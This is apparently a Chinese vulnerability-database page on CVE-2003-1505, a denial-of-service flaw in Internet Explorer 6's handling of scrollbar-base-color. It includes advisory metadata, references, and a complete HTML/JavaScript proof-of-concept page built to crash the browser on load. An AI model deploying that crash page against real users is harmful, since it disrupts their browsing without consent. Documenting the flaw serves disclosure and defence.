Microsoft Internet Explorer Scrollbar-Base-Color远程拒绝服务攻击漏洞

Microsoft Internet Explorer Scrollbar-Base-Color远程拒绝服务攻击漏洞

漏洞ID 1107532 漏洞类型 其他
发布时间 2003-10-22 更新时间 2003-12-31
图片[1]-Microsoft Internet Explorer Scrollbar-Base-Color远程拒绝服务攻击漏洞-安全小百科CVE编号 CVE-2003-1505
图片[2]-Microsoft Internet Explorer Scrollbar-Base-Color远程拒绝服务攻击漏洞-安全小百科CNNVD-ID CNNVD-200312-450
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/23273
https://cxsecurity.com/issue/WLB-2007100116
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-450
|漏洞详情
MicrosoftInternetExplorer是一款流行的WEB浏览程序。MicrosoftInternetExplorer不正确处理DIV对象的scrollbar-base-color属性,远程攻击者可以利用这个漏洞对目标用户浏览器进行拒绝服务攻击。攻击者可以构建包含畸形DIV对象的scrollbar-base-color属性的页面,诱使用户浏览器访问,可导致浏览器崩溃,产生拒绝服务攻击。
|漏洞EXP
source: http://www.securityfocus.com/bid/8874/info

It has been reported that Microsoft Internet Explorer is prone to a vulnerability that may allow an attacker to cause a denial of service condition in the software. The problem occurs due to improper handling of scrollbar-base-color attribute of the div object.

Successful exploitation of this issue may allow an attacker to create a webpage containing malicious script code that would cause a user's browser to crash upon visiting the site.

Microsoft Internet Explorer 6.0 has been reported to be vulnerable to this issue, however other versions may be affected as well.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>CRASH-IE</title>
<style type="text/css">
html, body {
overflow-y: hidden;
scrollbar-base-color: '#330066';
}

.crash {
position:absolute;
left:200px;
top:200px;
width:200px;
}

</style>
<script type="text/javascript">
function galgenfrist() {
window.setTimeout('crashIE();',1000);
}

function crashIE() {
var moveNode = document.getElementById("move");
if(moveNode) {
moveNode.style.top = "100px";
moveNode.style.left = "200px";
}
}
</script>
</head>
<body onload="galgenfrist();">
<h1>CRASH-IE</h1>
<div id="move" class="crash">
<table>
<tbody>
<tr>
<td>
<textarea></textarea>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>
|参考资料

来源:XF
名称:ie-scrollbarbasecolor-dos(13809)
链接:http://xforce.iss.net/xforce/xfdb/13809
来源:BID
名称:8874
链接:http://www.securityfocus.com/bid/8874
来源:BUGTRAQ
名称:20031022IE6CSS-Crash
链接:http://www.securityfocus.com/archive/1/342010
来源:SREASON
名称:3295
链接:http://securityreason.com/securityalert/3295
来源:NSFOCUS
名称:5572
链接:http://www.nsfocus.net/vulndb/5572

相关推荐: SquirrelMail Message Header Field Script Injection Vulnerability

SquirrelMail Message Header Field Script Injection Vulnerability 漏洞ID 1102176 漏洞类型 Input Validation Error 发布时间 2002-05-03 更新时间 200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享